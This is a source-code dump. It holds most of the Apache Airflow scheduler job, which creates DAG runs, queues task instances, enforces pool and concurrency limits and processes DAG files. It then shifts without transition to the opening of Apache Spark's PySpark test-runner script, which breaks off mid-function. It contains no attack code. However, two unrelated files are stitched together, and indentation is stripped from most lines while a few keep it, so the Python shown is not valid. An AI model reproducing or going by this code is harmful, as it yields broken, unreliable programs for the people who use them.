if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future unless
# specified by config and schedule_interval is None
if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
run.update_state(session=session)
if run.state == State.RUNNING:
make_transient(run)
active_dag_runs.append(run)
for run in active_dag_runs:
self.log.debug("Examining active DAG run: %s", run)
tis = run.get_task_instances(state=SCHEDULEABLE_STATES)
# this loop is quite slow as it uses are_dependencies_met for
# every task (in ti.is_runnable). This is also called in
# update_state above which has already checked these tasks
for ti in tis:
task = dag.get_task(ti.task_id)
# fixme: ti.task is transient but needs to be set
ti.task = task
if ti.are_dependencies_met(
dep_context=DepContext(flag_upstream_failed=True),
session=session):
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
        normally should not happen, but it can if the state of DagRuns is
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
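        # Example of the returned shapes (hypothetical values):
        #   dag_map  == {'example_dag': 3}                      # TIs in the given states per dag_id
        #   task_map == {('example_dag', 'task_a'): 2,
        #                ('example_dag', 'task_b'): 1}          # per (dag_id, task_id)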
return dag_map, task_map
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks = 0
num_tasks_in_executor = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
        # so these don't expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = timezone.utcnow()
session.merge(task_instance)
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
        :param simple_dag_bag: Should contain all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
        and that we do not exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
        :return: Number of task instances with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
            # set TIs back to the scheduled state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance.queued_dttm = None
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: airflow.models.DAG
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
if dag.is_paused:
self.log.info("Not processing DAG %s since it's paused", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
if conf.getboolean('core', 'CHECK_SLAS', fallback=True):
self.manage_slas(dag)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in \
(executors.LocalExecutor, executors.SequentialExecutor):
pickle_dags = True
self.log.info("Running execute loop for %s seconds", self.run_duration)
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
def processor_factory(file_path, zombies):
return DagFileProcessor(file_path,
pickle_dags,
self.dag_ids,
zombies)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
processor_factory,
processor_timeout,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
def _get_simple_dags(self):
return self.processor_agent.harvest_simple_dags()
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
# For the execute duration, parse and schedule DAGs
while (timezone.utcnow() - execute_start_time).total_seconds() < \
self.run_duration or self.run_duration < 0:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self._get_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for {0:.2f} seconds to prevent excessive logging"
.format(sleep_length))
sleep(sleep_length)
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
def _validate_and_run_task_instances(self, simple_dag_bag):
if len(simple_dag_bag.simple_dags) > 0:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag):
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: unicode
:param zombies: zombie task instances to kill.
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
        :param pickle_dags: whether to serialize the DAGs found in the file and
            save them to the db
:type pickle_dags: bool
        :return: a list of SimpleDags made from the DAGs found in the file,
            plus the number of import errors encountered
        :rtype: tuple[list[airflow.utils.dag_processing.SimpleDag], int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = [dag.dag_id for dag in dagbag.dags.values()
if dag.is_paused]
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
if len(self.dag_ids) > 0:
dags = [dag for dag in dagbag.dags.values()
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dagbag.dags.values()
if not dag.parent_dag and
dag.dag_id not in paused_dag_ids]
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# If the task is dummy, then mark it as done automatically
if isinstance(ti.task, DummyOperator) \
and not ti.task.on_success_callback:
ti.state = State.SUCCESS
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
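# Illustrative sketch: _execute_task_instances above hands the executable TIs to
# helpers.reduce_in_chunks with self.max_tis_per_query as the chunk size. Assuming
# reduce_in_chunks simply folds the list slice by slice, a hypothetical stand-in
# (_reduce_in_chunks_sketch is not an Airflow API) could look like this:
def _reduce_in_chunks_sketch(fn, iterable, initializer, chunk_size):
    """Fold `iterable` chunk by chunk, calling fn(accumulator, chunk) for each slice."""
    acc = initializer
    items = list(iterable)
    if chunk_size < 1:
        chunk_size = len(items) or 1  # treat a non-positive chunk size as "one big chunk"
    for start in range(0, len(items), chunk_size):
        acc = fn(acc, items[start:start + chunk_size])
    return acc
# Example: summing chunk lengths over 5 items with chunk_size=2 visits slices of 2, 2 and 1:
# _reduce_in_chunks_sketch(lambda acc, chunk: acc + len(chunk), range(5), 0, 2) == 5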
|
run-tests.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import logging
from optparse import OptionParser
import os
import re
import subprocess
import sys
import tempfile
from threading import Thread, Lock
import time
if sys.version < '3':
import Queue
else:
import queue as Queue
from distutils.version import LooseVersion
# Append `SPARK_HOME/dev` to the Python path so that we can import the sparktestsupport module
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), "../dev/"))
from sparktestsupport import SPARK_HOME # noqa (suppress pep8 warnings)
from sparktestsupport.shellutils import which, subprocess_check_output # noqa
from sparktestsupport.modules import all_modules, pyspark_sql # noqa
python_modules = dict((m.name, m) for m in all_modules if m.python_test_goals if m.name != 'root')
def print_red(text):
print('\033[31m' + text + '\033[0m')
LOG_FILE = os.path.join(SPARK_HOME, "python/unit-tests.log")
FAILURE_REPORTING_LOCK = Lock()
LOGGER = logging.getLogger()
# Find out where the assembly jars are located.
# Later, add back 2.12 to this list:
# for scala in ["2.11", "2.12"]:
for scala in ["2.11"]:
build_dir = os.path.join(SPARK_HOME, "assembly", "target", "scala-" + scala)
if os.path.isdir(build_dir):
SPARK_DIST_CLASSPATH = os.path.join(build_dir, "jars", "*")
break
else:
raise Exception("Cannot find assembly build directory, please build Spark first.")
def run_individual_python_test(test_name, pyspark_python):
env = dict(os.environ)
env.update({
'SPARK_DIST_CLASSPATH': SPARK_DIST_CLASSPATH,
'SPARK_TESTING': '1',
'SPARK_PREPEND_CLASSES': '1',
'PYSPARK_PYTHON': which(pyspark_python),
'PYSPARK_DRIVER_PYTHON': which(pyspark_python)
})
LOGGER.info("Starting test(%s): %s", pyspark_python, test_name)
start_time = time.time()
try:
per_test_output = tempfile.TemporaryFile()
retcode = subprocess.Popen(
[os.path.join(SPARK_HOME, "bin/pyspark"), test_name],
stderr=per_test_output, stdout=per_test_output, env=env).wait()
except:
LOGGER.exception("Got exception while running %s with %s", test_name, pyspark_python)
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(1)
duration = time.time() - start_time
# Exit on the first failure.
if retcode != 0:
try:
with FAILURE_REPORTING_LOCK:
with open(LOG_FILE, 'ab') as log_file:
per_test_output.seek(0)
log_file.writelines(per_test_output)
per_test_output.seek(0)
for line in per_test_output:
decoded_line = line.decode()
if not re.match('[0-9]+', decoded_line):
print(decoded_line, end='')
per_test_output.close()
except:
LOGGER.exception("Got an exception while trying to print failed test output")
finally:
print_red("\nHad test failures in %s with %s; see logs." % (test_name, pyspark_python))
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(-1)
else:
per_test_output.close()
LOGGER.info("Finished test(%s): %s (%is)", pyspark_python, test_name, duration)
def get_default_python_executables():
python_execs = [x for x in ["python2.7", "python3.6", "pypy"] if which(x)]
if "python2.7" not in python_execs:
LOGGER.warning("Not testing against `python2.7` because it could not be found; falling"
" back to `python` instead")
